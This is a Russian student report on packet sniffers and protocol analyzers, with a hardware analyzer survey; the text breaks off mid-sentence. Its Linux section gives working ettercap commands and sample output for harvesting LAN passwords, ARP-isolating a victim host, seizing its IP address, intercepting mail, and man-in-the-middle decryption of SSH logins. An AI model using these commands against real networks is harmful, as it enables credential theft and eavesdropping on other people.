Реферат: Определение подозрительных пакетов, анализ протоколов сети
Министерство Высшего и Среднего Специального
Образования Республики Узбекистан
Ташкентский Государственный Технический Университет
Факультет:«Компьютерные технологии»
Кафедра: «Компьютерные системы и сети»
РЕФЕРАТ
На тему: «Определение подозрительныхпакетов, анализ протоколов сети»
Выполнил:
маг. гр. 51М-02ИБ
Д. Бобокулов
Принял:
доц. Каримов М.М.
Ташкент-2002-03
<span Times New Roman",«serif»; mso-fareast-font-family:«Times New Roman»;color:#CC0000;mso-ansi-language:RU; mso-fareast-language:RU;mso-bidi-language:AR-SA">Содержание:1.<span Times New Roman""> Введение. 2. 2.<span Times New Roman""> Программныесредства анализа подозрительных пакетов на примере ОС Linux. 3. 3.<span Times New Roman""> Аппаратныесредства анализа пакетов(протоколов). Анализаторы. 8. 4.<span Times New Roman""> Критерии выбора анализатора пакетов. 11. 5.<span Times New Roman""> Заключение. 16. 6.<span Times New Roman""> Список использованных источников. 17. <span Times New Roman",«serif»; mso-fareast-font-family:«Times New Roman»;color:#CC0000;mso-ansi-language:RU; mso-fareast-language:RU;mso-bidi-language:AR-SA">
Введение.
В настоящее время аппаратная архитектура Ethernet завоевалабольшую часть рынка при создании локальных сетей, хотя существуют и другиеаппаратные решения не на IEEE 802.3, такие как FDDI, Token Ring (802.5),ARCNET, WAN, ATM и другие. Относительная недороговизна в сочетании стехнической скоростью передачи данных в 10, 100 и 1000 мегабит в секундуспособствует ее популярности. Сеть Ethernet работает как магистраль, черезкоторую любой узел может пересылать пакеты на другой узел, подключенный к томуже сегменту сети. Для перенаправления пакетов из одной сети в другую необходимопользоваться репитером, свитчем или концентратором. Процесс передачи фреймовобеспечивает межсетевой протокол, который не зависит от оборудования ипредставляет различные сети в одну сеть. Но при использовании этого протоколанет гарантий, что пакет достигнет адресата, но решение этой задачи обеспечиваетпротокол TCP/IP, занимающийся гарантированной доставкой пакетов. TCP неединственный протокол в стеке протоколов TCP/IP, существует еще протокол UDP,который много быстрее протокола TCP, так как не создает и не закрывает сеанссоединения, а узел с помощью его просто отправляет данные в дейтаграммах другимузлам в сети. Пакет, отправленный в широковещательной сети одним из узлов,принимается всеми находящимися в этом сегменте сети машинами, но только узелназначения, указанный в заголовке пакета, «смотрит» на него иначинает его обработку (относится и к TCP и к UDP протоколам).
Перехватчики сетевых пакетов могут не только использоватьсяадминистратором сети для проверки и детального анализа правильностиконфигурации сетевого программного обеспечения, но и представляют собойсерьезную угрозу, поскольку могут перехватывать и расшифровывать имена и паролипользователей, конфиденциальную информацию, нарушать работу отдельныхкомпьютеров и сети в целом.
Анализаторыпакетов относятся к классу инструментальных программных средств для мониторингасетевого трафика и выявления некоторых типов сетевых проблем. По умолчаниюсетевой интерфейс видит пакеты, предназначенные только для него. Однакоанализаторы устанавливают его в режим приема всех пакетов — promiscuous mode,прослушивают сеть и заставляют сетевой интерфейс принимать все фреймы, внезависимости от того, кому они адресованы в сети.
<span Times New Roman",«serif»;mso-fareast-font-family: «Times New Roman»;mso-ansi-language:RU;mso-fareast-language:RU;mso-bidi-language: AR-SA">Программные средства анализаподозрительных пакетов на примере ОС Linux.
Для установки «вручную» сетевогоинтерфейса в неразборчивый режим необходимо включить флаг PROMISC: ifconfigeth0 promisc; для отключения promiscuous mode: ifconfig eth0 -promisc.
Яркимпримером инструментального программного средства служит программа tcpdump, написанная ВэномЯкобсоном и поставляющаяся сейчас со многими дистрибутивами. Примериспользования tcpdump:
tcpdump -i eth0 -n -vv -w /root/tcpdump.log
где:
-I — сетевой интерфейс;
-n — делаем числовой вывод адресов и номеров портов;
-vv — очень подробный вывод;
-w — запись лога в файл.
Чтобы прочитать перехваченный трафик из лога (выводим не на консоль, а в файл):
tcpdump -r /root/tcpdump.log > /root/tcpdump0.log
Фрагментработыtcpdump:
14:06:28.250082 B 192.168.5.17.1445 > 255.255.255.255.8167: udp 21
14:07:24.126187 > midian > 192.168.5.23: icmp: echo request
14:07:24.126667 < 192.168.5.23 > midian: icmp: echo reply
Первая строка показывает, что 192.168.5.17 пользуетсяпрограммой для общения в локальной сети (делает широковещательный запрос,используется порт 8167), вторая и третья указывают, что хост midian проверяетмашину с IP-адресом 192.168.5.23 программой ping.
Анализаторы пакетов, несомненно,полезны для решения администратором сети известных и неизвестных проблем, носуществует и обратная сторона медали: неразборчивый режим приема пакетов позволяетзлоумышленнику получать весь трафик в сети и фильтровать его на наличие имен,паролей пользователей, незашифрованных писем и т.д. Теперь все толькоограничивается фантазией хакера.
Ettercap
Особенности этого сниффера:
Установкасниффера:
./configure
make
make install
Установкаплагинов:
make plug-ins
make plug-ins_install
Некоторые опции сниффера:
-a, -s, -m — различные виды прослушивания;
-N — запускать сниффер без псевдографики;
-z — запуск в спокойном режиме;
-d — не преобразовывать IP-адреса в имена;
-i — сетевой интерфейс;
-l — вывести список хостов в сети;
-C — собирать все имена и пароли пользователей;
-f — определение операционной системы удаленного хоста;
-p — работа с плагинами;
-L — записывать в лог, имеющий формат: год: месяц: день-collected-pass.log
Рассмотрим некоторые виды использования этого сниффера.Перехватываем все имена пользователей и пароли в нашем сегменте сети изаписываем в лог:
ettercap -NdzsCLi eth0
После недолгого ожидания получаем необходимое ;)
14:43:45 192.168.5.29:1755 <--> 212.48.140.154:80 www
USER: leshii
PASS: softerra
www.nm.ru/gateway_chat.shtml
Определяем операционную систему хоста, например, с IP-адресом 192.168.5.24:
ettercap — Ndzsfi eth0 192.168.5.24
Смотрим установленные у нас плагины и описания к ним:
ettercap — N -p list
Для активации плагина (например, пропингуем какой-нибудь хост):
ettercap — N -p ooze 192.168.5.33
Самый интересным плагином является leech. Он изолирует удаленный хост от сети.Пример работы этого плагина:
Сначала проверим, «жив» ли хост:
andrushock# ping -v -c 4 192.168.5.23
PING 192.168.5.23 (192.168.5.23): 56 data bytes
64 bytes from 192.168.5.23: icmp_seq=0 ttl=128 time=0.945 ms
64 bytes from 192.168.5.23: icmp_seq=1 ttl=128 time=0.562 ms
64 bytes from 192.168.5.23: icmp_seq=2 ttl=128 time=0.524 ms
64 bytes from 192.168.5.23: icmp_seq=3 ttl=128 time=0.520 ms
Запускаем плагин (операционная система хоста жертвы — win98se):
andrushock# ettercap -Ndp leech 192.168.5.23
Наблюдаем за процессом работы:
Your IP: 192.168.5.21 MAC: 00:50:BF:4A:48:F3 Iface: ed0
Starting ./ec_leech.so plugin...
Building host list for netmask255.255.255.0, please wait...
Sending 255 ARP request...
Listening for replies...
Isolating host 192.168.5.23...Press return to stop
Ждемпаруминутисмелонажимаем^C, затемпроверяемработуплагина:
andrushock# ping -v -c 4 192.168.5.23
PING 192.168.5.23 (192.168.5.23): 56 data bytes
---192.168.5.23 ping statistics---
4 packets transmitted, 0 packet received, 100% packet loss
andrushock#
Сетевой интерфейс на машине жертвы на некоторое времяперестает работать, хотя операционная система и запущенные приложенияфункционируют в том же нормальном режиме. Но этого «некоторого»времени хватает, например, для того, чтобы заполучить себе IP-адрес жертвы:
ifconfig eth0 down
ifconfig eth0 inet 192.168.5.23
ifconfig eth0 up
И набираем команду, чтобы удостовериться о нашем«новом» IP-адресе: ifconfig eth0
Перехват незашифрованных почтовых сообщений. Вид записи:./ettercap -Nzds <IP-адрес почтового сервера>:<port почтовогосервера> <IP- адрес клиента>
Пример перехвата исходящих писем:
./ettercap -Nzds ANY:25 ANY > /root/sniff.smtp
И смотрим через некоторое время, что попалось в наши сети (привожу часть лога):
сat /root/sniff.smtp
Your IP: 192.168.5.21 with MAC: 00:50:BF:4A:48:F3 on Iface: eth0
Press 'h' for help...
Sniffing (IP based): ANY:0 <--> ANY:25
18:19:14 192.168.5.23:1030 --> 80.68.244.5:25
18:19:14 80.68.244.5:25 --> 192.168.5.23:1030
Далее идет процесс аутентификации, письмо от кого, адрес реципиента, ихвалидность и сам текст письма.
To: andrushock@fromru.com.
Subject: test.
Mime-Version: 1.0.
Content-Type: text/plain; charset=us-ascii.
Content-Transfer-Encoding: 7bit.
.
Hello andrushock,.
.
Test for Softerra.
.
— .
Best regards,.
Noname mailto: ******@pisem.net.
Далее сообщение демона о принятии письма к отправке и завершение почтовымсервером соединения.
Для перехвата входящих в локальную сеть электронных писемиспользуем:
./ettercap -Nzds ANY:110 ANY > /root/sniff.pop3
или
./ettercap -Nzds ANY:143 ANY > /root/sniff.imap4
Пример перехвата паролей во время сессии SSH:
На одной машине 192.168.5.21 стоит ettercap (назовем злоумышленник), на втором192.168.5.4 sshd (назовем сервер), а на третьем 192.168.5.22 SecureCRT (назовемклиент).
./ettercap -Ndl — выводим список всех ipс МАС-адресами машин в сегментелокальной сети, запоминаем только МАС-адреса сервера и клиента. Запускаемсниффер на прослушивание и ждем когда клиент инициализирует сеанс Secure Shellс сервером и начнется процесс аутентификации. В этом случае машина злоумышленникаявляется «мостом», через который будет проходить и расшифровыватьсяна лету весь проходящий траффик между клиентом и сервером.
Вид записи:
./ettercap -za <IP-адрес сервера> <IP-адрес клиента> <MAC-адрессервера> <MAC-адрес клиента>
./ettercap -za 192.168.5.4 192.168.5.22 00:50:BF:03:BC:47 00:A0:24:93:61:3D
Привожу «текстовый скриншот»
ettercap 0.5.4
SOURCE: 192.168.5.22? Filter:OFF
doppleganger — illithid (ARP Based) — ettercap
DEST: 192.168.5.4? Active Dissector: ON
??? hosts in this LAN (192.168.5.21: 255.255.255.0)
1) 192.168.5.22:1252 ?? 192.168.5.4:22 | silent | SSH decrypt
Your IP: 192.168.5.21 MAC: 00:50:BF:4A:48:F3 Iface: ed0 Link: not tested
USER: testuser
PASS: softerra
В левом нижнем углу лицезреем уже расшифрованные имяпользователя и его пароль. Примечание: сетевой интерфейс действительно ed0, таккак программа тестировалась в операционных системах Linux и FreeBSD.
Постоянно выходят новые версии Ettercap, в которыхисправляются ошибки (например, только несколько версий назад исправили«глюк», когда после работы сетевой интерфейс, на котором был запущенэтот сниффер падал), добавляются новые возможности и переносы на другиеоперационные системы, в отличие от программ описанных ниже, работа над которымиуже давно не ведется, хотя в настоящее время эти анализаторы протоколовявляются самыми популярными.
sniffit Возможности этого сниффера:
работает на LINUX, SunOS/Solaris, Irix, FreeBSD, BSDi, DEC/OSF, NetBSD; перехват паролей FTP, Telnet, SMTP, HTTP, POP, poppass, NNTP, IMAP, SNMP, LDAP, Rlogin, RIP, OSPF, PPTP, MS-CHAP, NFS, VRRP, YP/NIS, SOCKS, X11, CVS, IRC, AIM, ICQ, Napster, PostgreSQL, Meeting Maker, Citrix ICA, Symantec pcAnywhere, NAI, Sniffer, Microsoft SMB, Oracle SQL*Net, Sybase and Microsoft SQL; использование конфигурационных файлов для создания фильтров; имеет текстовый и псевдографический (основанный на ncurses) интерфейсы.dsniffПримечание: эту версию сниффера я не смог поставить на Red Hat Linux 7.0,поэтому пришлось качать более новую, но beta, где как раз исправлена ошибкакомпоновки для дистрибутивов Red Hat Linux 6,7.
Возможности этого сниффера:
работаетнаOpenBSD(i386), Redhat Linux (i386), Solaris (sparc), FreeBSD, Debian Linux, SlackwareLinux, AIX, HP-UX;
перехватпаролейFTP, Telnet, SMTP, HTTP, POP, poppass, NNTP, IMAP, SNMP, LDAP, Rlogin, RIP, OSPF, PPTP, MS-CHAP, NFS, VRRP, YP/NIS, SOCKS, X11, CVS, IRC, AIM, ICQ, Napster, PostgreSQL, Meeting Maker, Citrix ICA, Symantec pcAnywhere, NAI, Sniffer, Microsoft SMB, Oracle SQL*Net, Sybase, Microsoft SQL; также в этот пакет входит набор «утилит» для перехвата сообщений AOL Instant Messenger, ICQ 2000, IRC, Yahoo Messenger chat, прослушивания ssh траффика, флуда локальной сети случайными MAC-адресами, ограничения пропускной способности соединения, обрыва заданного TCP-соединения и др.; не имеет псевдографического интерфейса.<span Arial",«sans-serif»; mso-fareast-font-family:«Times New Roman»;mso-ansi-language:RU;mso-fareast-language: RU;mso-bidi-language:AR-SA">Аппаратныесредства анализа пакетов (протоколов).Анализаторы протоколов передачи данных.<span Times New Roman",«serif»;font-weight:normal;mso-bidi-font-weight:bold; font-style:normal;mso-bidi-font-style:italic">Сегодня оборудование передачиданных можно найти практически в любом офисе и на каждом промышленномпредприятии. В офисе это различные периферийные устройства для персональныхкомпьютеров и оборудование передачи данных по корпоративным или территориальнымсетям, на производстве — системы сбора информации и управления. Разнообразиеустройств, обменивающихся данными, растет с каждым днем, однако набориспользуемых при этом интерфейсов не претерпел существенных изменений. К томуже с течением времени отрасль выработала множество приспособлений иинструментов для тестирования интерфейсов на различном уровне и диагностикипроблем взаимодействия устройств.
Один из самых старых интерфейсов, RS-232, имеет огромное числоразновидностей. Несмотря на то что любой специалист по вычислительной техникеили микроконтроллерам знает его цоколевку наизусть, тем не менее проблемы могутвозникнуть уже на этапе подключения устройств друг к другу. Особенно часто этобывает вызвано отсутствием информации о том, какие управляющие сигналыиспользуются, к какому типу относятся устройства (DTE/DCE), каковы скорость иформат передачи данных. Комплект простейших устройств, который будет описанниже, существенно облегчает работу тем, кому приходится иметь дело с этиминтерфейсом.
<span Verdana",«sans-serif»"><img src="/cache/referats/14275/image001.jpg" v:shapes="_x0000_i1025">
Для того чтобы изготовить переходник, совсем не обязательно пользоватьсяпаяльником — достаточно простого приспособления, с помощью которого контактыодного разъема можно было бы соединить с контактами другого в нужнойпоследовательности обычным проводом без пайки. Такой мини-кросс позволяет нетолько создать устройство с нужной схемой, но и подобрать требуемую схемусоединения.
<span Verdana",«sans-serif»"><img src="/cache/referats/14275/image002.jpg" v:shapes="_x0000_i1026">
Чтобы понять, почему же обмен не происходит, совсем не обязательно искатьанализатор — для диагностики достаточно простого индикатора, если он позволяетпровести мониторинг основных сигналов. Его двухцветные светодиоды могутидентифицировать высокий/низкий уровень сигнала, его отсутствие и линии, покоторым ведется передача данных.
Иногда функции мини-кросса и индикатора объединяются. Однако рынокпредлагает и более универсальные приборы (их английское название — breakoutbox, специального русского термина пока нет, поэтому мы будем называть ихпросто тестерами). Изобилие разновидностей этого вида приборов поражает. Помимокроссировки и индикации состояния линий они позволяют отключать или подключатьотдельные линии в процессе отладки,
<span Verdana",«sans-serif»"><img src="/cache/referats/14275/image003.jpg" v:shapes="_x0000_i1027">
подавать на них сигналы определенного уровня, фиксировать наличие на линияхкоротких импульсов. Появившиеся во времена расцвета интерфейса RS-232/V.24,такие приборы стали настолько популярны, что сегодня производителямивыпускается широкая гамма моделей для последовательных синхронных и асинхронных(RS-422/423, RS-449/V.36, X.21, V.35), а также параллельного (Centronics)интерфейсов.
Большинство моделей снабжено встроенным тестером кабелей для проверки илиопределения электрической схемы. Некоторые модели имеют встроенный мультиметр.
<span Verdana",«sans-serif»"><img src="/cache/referats/14275/image005.jpg" v:shapes="_x0000_i1028">
Следующими по уровню сложности являются устройства, выполняющие функциитестера частоты ошибочных битов/блоков (bit/block error rate, BER/BLER ). Они позволяютизмерить параметры, используемые для оценки качества канала и его диагностики(количество полученных блоков; долю битов/блоков, содержащих ошибки; суммусекунд, когда наблюдались ошибки; число случаев потерь синхронизации; суммусекунд, когда имели место сбои синхронизации; количество ошибок четности ифрейминга, а также время выполнения теста и частоту появления ошибок вбитах/блоках). Хорошие приборы имеют встроенный генератор тестовыхпоследовательностей для синтеза
<span Verdana",«sans-serif»"><img src="/cache/referats/14275/image006.jpg" v:shapes="_x0000_i1029">
определенных наборов символов (наиболее часто используютсяпоследовательности «quick brown fox» и «barber poles») или передачи задаваемогопользователем набора символов. Некоторые приборы имеют опции для тестированиястатистических мультиплексоров (опрос устройств и управление потоком Xon/Xoff),мониторинга каналов SDLC, работы с протоколами SNA и X.25 и т. п.
Особое место занимают устройства регистрации, так называемые логгеры, дляфиксации и записи данных в реальном масштабе времени. Сохраненные в ихвнутреннем буфере данные можно просмотреть на дисплее логгера или распечатать спреобразованием в нужную кодовую таблицу (например, ASCII).
<span Verdana",«sans-serif»"><img src="/cache/referats/14275/image007.jpg" v:shapes="_x0000_i1030">
Большинство логгеров реализует и все описанные выше функции. Самые мощныелоггеры имеют алфавитно-цифровой дисплей и полноразмерную клавиатуру дляредактирования и моделирования сообщений. Подготовленные таким образомсообщения могут использоваться при отладке различных устройств.
Особняком стоят более мощные (и существенно более дорогие) приборы дляанализа протоколов передачи данных по глобальным сетям (WAN). Вообще всовременном мире, после перехода телефонии на цифровые принципы, граница междуданными цифровых телефонных систем и данными вычислительных сетей
<span Verdana",«sans-serif»"><img src="/cache/referats/14275/image008.jpg" v:shapes="_x0000_i1031">
становится все более расплывчатой. В случае PDH/SDH на канальном уровнеотличия между ними вообще не существуют. Они появляются на более высокомуровне, где используются специфические протоколы. Поскольку все анализаторывыполнены на базе обычных компьютеров (как правило, это ноутбуки с наборомдополнительных интерфейсных карт), то почти всегда можно найти несколькооднотипных моделей, отличающихся конкретным набором протоколов и ценой.Некоторые производители идут по пути создания сверхуниверсальных приборов,которые могут использоваться как в телефонии, так и при передаче данных. Другиепредлагают узкоспециализированные приборы, но за меньшую цену.
<span Verdana",«sans-serif»"><img src="/cache/referats/14275/image009.jpg" v:shapes="_x0000_i1032">
Большинство современных приборов этого типа позволяет анализировать сразунесколько протоколов глобальных сетей, таких, как X.25, PPP, SLIP, SDLC/SNA,frame relay, SMDS, ISDN, протоколы мостов/маршрутизаторов (3Com, Cisco, BayNetworks и другие). Такие анализаторы позволяют измерять различные параметрыпротоколов, анализировать трафик в сети, преобразование между протоколамилокальных и глобальных сетей, задержку на маршрутизаторах при этихпреобразованиях и т. п. Более совершенные приборы предусматривают возможностьмоделирования и декодирования протоколов глобальных сетей, «стрессового»тестирования, измерения максимальной пропускной способности, тестированиякачества предоставляемых услуг. Стоит отметить и тот факт, что в целяхуниверсальности почти все анализаторы протоколов глобальных сетей реализуютфункции тестирования ЛВС и всех основных интерфейсов. Некоторые приборыспособны осуществлять анализ протоколов телефонии. А самые современные моделимогут декодировать и представлять в удобном варианте все семь уровней OSI.Появление ATM привело к тому, что производители стали снабжать свои анализаторысредствами тестирования этих сетей. Такие приборы могут проводить полноетестирование сетей АТМ уровня E-1/E-3 с поддержкой мониторинга и моделирования.Очень важное значение имеет набор сервисных функций анализатора. Некоторые изних, например возможность удаленного управления прибором, просто незаменимы.
<span Verdana",«sans-serif»"><img src="/cache/referats/14275/image010.jpg" v:shapes="_x0000_i1033">
Таким образом, современные анализаторы протоколов WAN/LAN/ATM позволяютобнаружить ошибки в конфигурации маршрутизаторов и мостов; установить типтрафика, пересылаемого по глобальной сети; определить используемый диапазонскоростей, оптимизировать соотношение между пропускной способностью иколичеством каналов; локализовать источник неправильного трафика; выполнитьтестирование последовательных интерфейсов и полное тестирование АТМ;осуществить полный мониторинг и декодирование основных протоколов по любомуканалу; анализировать статистику в реальном времени, включая анализ трафикалокальных сетей через глобальные сети.
Критерии, по которым следует выбирать анализатор протоколовЛюбой сетевой администратор, который однажды столкнулся с задачейтрансформации сети, скажет, что новые технологии привносят не меньше новыхпроблем, нежели решают. Анализатор протоколов позволяет выявлять и устранятьпроблемы существующей сети, а также упростить процесс перехода к новойтехнологии. Благодаря анализатору можно не только оперативно устранять проблемыпо мере их возникновения, но и предупреждать их появление.
Анализаторы протоколов — это «горячий» продукт, который,естественно, достаточно широко представлен на рынке телекоммуникаций. Крометого, это довольно дорогое устройство. Как выбрать наиболее подходящий?Необходим системный подход. Выделяют ряд критериев, по которым оцениваютанализаторы протоколов:
Возможность декодирования сетевых протоколов и поддержки сменных интерфейсов. Качество интерфейса программного обеспечения. Наличие многоканальности. Возможность интеграции с PC. Размер и вес. Соотношение цены и предоставляемых услуг.Рассмотрим представленные на рынке телекоммуникаций анализаторы протоколов иоценим их с точки зрения этих критериев. Проведенные автором исследования рынкапоказали, что наибольшее распространение на российском рынке анализаторовполучили модели Domino и DA-30 фирмы Wandel&Golterman, J2300A фирмыHewlett-Packard, Fireberd 300 и Fireberd 500 фирмы TTC (TelecommunicationTechnic Corporation), Sniffer компании Network General и серия продуктовкомпании RADCOM(RC-88WL, RC-100WL).
<span Times New Roman",«serif»; mso-fareast-font-family:«Times New Roman»;mso-ansi-language:RU;mso-fareast-language: RU;mso-bidi-language:AR-SA">Поддерживаемые протоколы и физические интерфейсы
Поддерживаемые протоколы и возможность физического подсоединения к различнымфизическим интерфейсам определяют сферу и широту применения анализтора.
Физические интерфейсыВ число традиционно поддерживаемых физических интерфейсов входят V.35,RS-232/V.24, RS-449, RS-530, X.21/V.11, которые обычно включаются в базовыйкомплект поставки анализатора. Интерфейсы Е1, Т1, Ethernet, Token Ring являютсядополнительными и обычно не входят в базовый комплект. Благодаря модульнойструктуре конструкции анализатора, всегда остается возможность его оснащениятребуемыми физическими интерфейсами. Отсутствие поддержки каких-либо из этихинтерфейсов или неоправданно высокая стоимость, может оказаться слабой сторонойанализатора. Модель Domino фирмы Wandel&Golterman не поддерживает интерфейсТ1, что для российских условий не является существенным, однако, отсутствиеподдержки интерфейса Е1 моделями Fireberd 300, Fireberd 500 фирмы TTC можетстать серьезным ограничением для их использования.
ПротоколыВ международной классификации сетевые протоколы подразделяются на классы,или серии, которые содержат протоколы с общими признаками. Анализ сетевыхпротоколов — центральная задача анализатора, поэтому естественным требованиемсистемного администратора является поддержка максимального количествапротоколов. На практике же оказывается, что возможность работы рядаанализаторов с частью протоколов из класса не всегда подразумевает поддержкуцелого класса.
Наибольшей полнотой возможностей работы с сетевыми протоколами отличаютсямодели J2300А компании Hewlett-Packard, RC-88WL и RC-100WL фирмы RADCOM. Насегодняшний день они поддерживают декодирование около 140 сетевых протоколов,что является практически полным списком используемых протоколов. Например,протокол Apollo Domain поддерживает только модель J2300A Hewlett Packard, апротокол RND — только указанные модели фирмы RADCOM.
Список протоколов, поддерживаемых другими анализаторами, не так обширен.Модели Domino, DA-30 компании Wandel&Golterman не поддерживают такиепротоколы серии TCP/IP, как TELNET, FTP, TFTP, и отдельные протоколы другихгрупп.
Интерфейс программного обеспеченияПочему интерфейс программного обеспечения является таким важным фактором?Чем «дружественнее» оболочка программного обеспечения, темэффективнее работа администратора, кроме того, графический оконный интерфейсспособствует быстрому освоению программного обеспечения и позволяет адекватновоспринимать выдаваемую анализатором информацию. В результате широкогораспространения среды MS-Windows графический оконный интерфейс стал некоторымстандартом для компьютерных приложений. Однако каждая фирма-производительанализаторов протоколов использует свой собственный подход к организациипрограммного интерфейса.
Компания RADCOM изначально ориентировалась на графический оконный интерфейс(выход первых моделей анализаторов в 1991г. совпал с моментом признанияMS-Windows). Естественно, что с устранением системных ошибок в среде MS-Windowsустранялись ошибки и в программном обеспечении анализатора. Сейчас программноеобеспечение RADCOM стало высоконадежным и зрелым продуктом. Для анализаторовDomino и DA-30 фирмы Wandel&Golterman графический оконный интерфейсявляется достаточно новым (используется в них, начиная с июня 1995 г.) и невсегда удобен для работы. Анализаторы протоколов Sniffer компании NetworkGeneral и J2300A компании Hewlett-Packard предлагают два различных типапрограммного обеспечения: графический оконный интерфейс — для работы слокальными сетями, интерфейс под операционную среду MS-DOS — для работы сраспределенными сетями. Последний тип ПО никак не может считаться передовым,поскольку усложняет работу оператора и накладывает дополнительные ограниченияна свое использование.
МногоканальностьНаличие или отсутствие функции одновременной работы с несколькими каналамиочень часто является определяющим при классификации анализатора. Как известно,в классе протокольных анализаторов выделяют подкласс с более богатымифункциональными и исследовательскими возможностями (Research and Development,или R&D Analyzers). В качественных моделях анализаторов поддержка работы снесколькими каналами обычно подразумевает наличие дополнительной функцииимитации. Эта функция в совокупности с многоканальностью позволяет использоватьанализатор одновременно в качестве генератора проверочных последовательностей итестирующего оборудования. Следует отметить, что далеко не все анализаторы,представленные на рынке ( а их более десятка! ), поддерживают многоканальность.
Анализаторы компаний RADCOM и Wandel&Golterman в полной мереподдерживают эту функцию. Например, RADCOM предлагает очень практичное решение: наличие поддержки одновременной работы с двумя физическими каналами всовокупности с принципом модульности физических интерфейсов позволяют получитьпрактически любую требуемую конфигурацию. Кроме наиболее часто используемойконфигурации — интерфейс локальной сети плюс интерфейс распределенной — можноиспользовать интерфейсы двух локальных или двух распределенных сетей.
Модель Fireberd 300 фирмы TTC позволяет одновременно работать c каналамираспределенных и локальных сетей, но не более чем с одним видом в определенныйпромежуток времени. Этот анализатор не может одновременно тестировать два различныхсегмента локальной сети или два канала связи распределенной сети. Сетевыеадминистраторы лишаются очень важной и естественной возможности — анализироватьтрафик смежных сегментов сети, а при необходимости — генерировать проверочныепоследовательности на одном сегменте сети и проверять их на соседнем средствамиодного устройства. Модели Sniffer компании Network General и J2300A компанииHewlett-Packard не поддерживают одновременную работу с несколькими каналами. Намомент написания статьи компания Hewlett-Packard объявила, что поддержкафункции многоканальности должна быть реализована ею в ближайшее время. Однакостоит учитывать тот факт, что не всегда новые продукты отвечают требованиям,исходя из которых они создавались, и может пройти некоторое время, прежде чембудут устранены их недостатки и проведены доработки.
Интеграция с персональным компьютеромСоставной частью любого анализатора протоколов является персональныйкомпьютер (класс тестеров физического уровня выходит за рамки рассмотренияданной статьи). Известны два принципиальных подхода к организациивзаимодействия между анализатором протоколов и ПК. Первый состоит в интеграциианализатора и компьютера на базе единого устройства, второй, более современный,- в их совместном использовании, как независимых составляющих. В последнемслучае удается строго разделить функции, выполняемые каждым устройством. Такойподход позволяет осуществлять независимую модернизацию составляющих и являетсяособенно актуальным при существующем развитии компьютерных технологий.
Анализаторы могут быть аппаратно реализованы как внутренняя плата дляперсонального компьютера и как отдельное устройство. Крупный недостатоканализаторов, реализованных в виде внутренней платы, может проявиться прижелании переставить его в ПК с другой шиной. Для анализаторов Sniffer дажесуществуют подразделения на Type I, Type II, Type III, которые предназначеныдля шин ISA, EISA и т.д. Еще одним ограничением, которое связано с такимподходом, является требование двух свободных слотов, что особенно критично длякомпьютеров типа Notebook. Более распространенным подходом является реализацияанализатора протоколов в виде отдельного устройства. Из этого направления, всвою очередь, можно выделить случаи интеграции функций анализатора иперсонального компьютера. В анализаторе DA-30 фирмы Wandel&Goltermanиспользуется встроенный PC 386/16Mhz, а в модели Fireberd 500 фирмы ТТС — PC486/33Mhz. При существующем развитии компьютерных технологий такой подход можетстать серьезным недостатком, поскольку практически исключает возможностьувеличения мощности или обновления компьютера.
Наиболее жизнеспособным и рентабельным считается подход, обеспечивающийвыполнение специальных операций (захвата, декодирования, эмуляции) с помощьюсредств независимого устройства, а отображение и обработку результатов сетевоготестирования — средствами отдельного персонального компьютера. Компания RADCOMиспользует архитектурный подход, в котором функции анализатора протоколов икомпьютера строго разделены. Компьютер соединяется с анализатором черезпараллельный порт и служит для управления и отображения результатов сетевоготестирования. При таком подходе снимаются какие-либо ограничения наиспользуемый компьютер (единственное накладываемое ограничение — требованиеподдержки MS-Windows).
ПортативностьРазмер и вес — это те параметры, которые не являются существенными для«тяжелого» сетевого оборудования, устанавливаемого стационарно, но,наоборот, важны при использовании протокольного анализатора. Проблема можетвозникнуть в любом сегменте сети, и чем компактнее и легче анализатор, темудобнее он будет в эксплуатации. Использование параллельной RISC-архитектуры ипроцессора Intel 960i позволило компании RADCOM добиться высокойпроизводительности при портативности моделей по размеру и весу. При размере21,6х27,8х2,5 см (сопоставимо с размерами книги формата А4 объемом 100 страниц)анализатор весит всего 1,5 кг. По данному параметру этот анализатор сопоставимтолько с моделью Domino, минимальный вес которой составляет 1,3 кг для одноканальнойи 2,6 кг для двухканальной модификации. Sniffer сложно охарактеризовать поэтому параметру, так как его весовые характеристики полностью зависят отиспользуемого с ним компьютера. Другие анализаторы протоколов обычно вполтора-два раза больше и весят около 8 кг.
Соотношение цены и предоставляемых услугЭтот критерий является определяющим при выборе пратически любогооборудования. Однако было бы правильнее рассматривать соотношение цены итребуемых функций. Такой подход к выбору анализаторов протоколов является болееоправданным, поскольку позволяет платить деньги только за жизненно необходимыефункции, имея возможность их расширения по мере возникновения потребностей.Большинство рассматриваемых моделей находятся в одних ценовых рамках, поэтомупри выборе анализатора следует обращать внимание прежде всего на схемуценообразования.
Наиболее оправданным является подход минимального базового комплекта аппаратногои программного обеспечения, который может быть дополнен требуемым и физическимиинтерфейсами и пакетами дешифровки или имитации протоколов. Подводными камнямив этом случае станут технические особенности каждого анализатора. Остановимсяна одном показательном примере. Модели Fireberd 500 для работы с локальнымисетями требуются разные физические интерфейсы для Token Ring и Ethernet. Такимобразом, чтобы получить возможность анализа любой комбинации сегментов (TokenRing /Ethernet, Token Ring/Token Ring или Ethernet/Ethernet), вместо двухтребуется четыре физических интерфейса анализатора.
Перспективы дальнейшего использованияКаждый из представленных на рынке телекоммуникаций анализаторов протоколовимеет свои преимущества. Анализаторы Fireberd 300 и 500 поддерживают стандартRMON; J2300A и Sniffer имеют встроенную экспертную систему; продукты компани